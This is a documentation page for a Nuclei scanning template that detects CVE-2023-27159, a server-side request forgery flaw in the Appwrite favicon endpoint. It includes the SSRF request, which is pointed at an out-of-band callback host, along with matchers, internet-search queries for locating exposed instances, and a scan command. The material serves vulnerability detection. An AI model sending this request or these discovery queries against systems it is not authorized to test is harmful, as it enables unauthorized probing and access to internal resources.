Appwrite <=1.2.1 - Server-Side Request Forgery
ID: CVE-2023-27159
Severity: high
Author: DhiyaneshDk
Tags: cve2023,cve,appwrite,ssrf,oast
Description
Section titled “Description”Appwrite through 1.2.1 is susceptible to server-side request forgery via the component /v1/avatars/favicon. An attacker can potentially access network resources and sensitive information via a crafted GET request, thereby also making it possible to modify data and/or execute unauthorized administrative operations in the context of the affected site.
YAML Source
Section titled “YAML Source”id: CVE-2023-27159
info: name: Appwrite <=1.2.1 - Server-Side Request Forgery author: DhiyaneshDk severity: high description: | Appwrite through 1.2.1 is susceptible to server-side request forgery via the component /v1/avatars/favicon. An attacker can potentially access network resources and sensitive information via a crafted GET request, thereby also making it possible to modify data and/or execute unauthorized administrative operations in the context of the affected site. impact: | This vulnerability can lead to unauthorized access to internal resources, potential data leakage, and further exploitation of the server. remediation: | Upgrade Appwrite to a version higher than 1.2.1 to mitigate the SSRF vulnerability. reference: - https://gist.github.com/b33t1e/43b26c31e895baf7e7aea2dbf9743a9a - https://notes.sjtu.edu.cn/gMNlpByZSDiwrl9uZyHTKA - https://nvd.nist.gov/vuln/detail/CVE-2023-27159 - http://appwrite.com - https://github.com/appwrite/appwrite classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-27159 cwe-id: CWE-918 epss-score: 0.00418 epss-percentile: 0.74069 cpe: cpe:2.3:a:appwrite:appwrite:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: appwrite product: appwrite shodan-query: - title:"Sign In - Appwrite" - http.title:"sign in - appwrite" - http.favicon.hash:-633108100 fofa-query: - icon_hash=-633108100 - title="sign in - appwrite" google-query: intitle:"sign in - appwrite" tags: cve2023,cve,appwrite,ssrf,oast
http: - method: GET path: - "{{BaseURL}}/v1/avatars/favicon?url=http://{{interactsh-url}}"
matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http"
- type: word part: interactsh_request words: - "User-Agent: Appwrite-Server"# digest: 4a0a004730450221008856edeb19097d77edaad56a6aa1c10e08173b987c6ec813f2508d923e0c1cb0022001f507b9531cbf44335f7932ede127ab6a92c68cc0f4132f75be040e11210595:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-27159.yaml"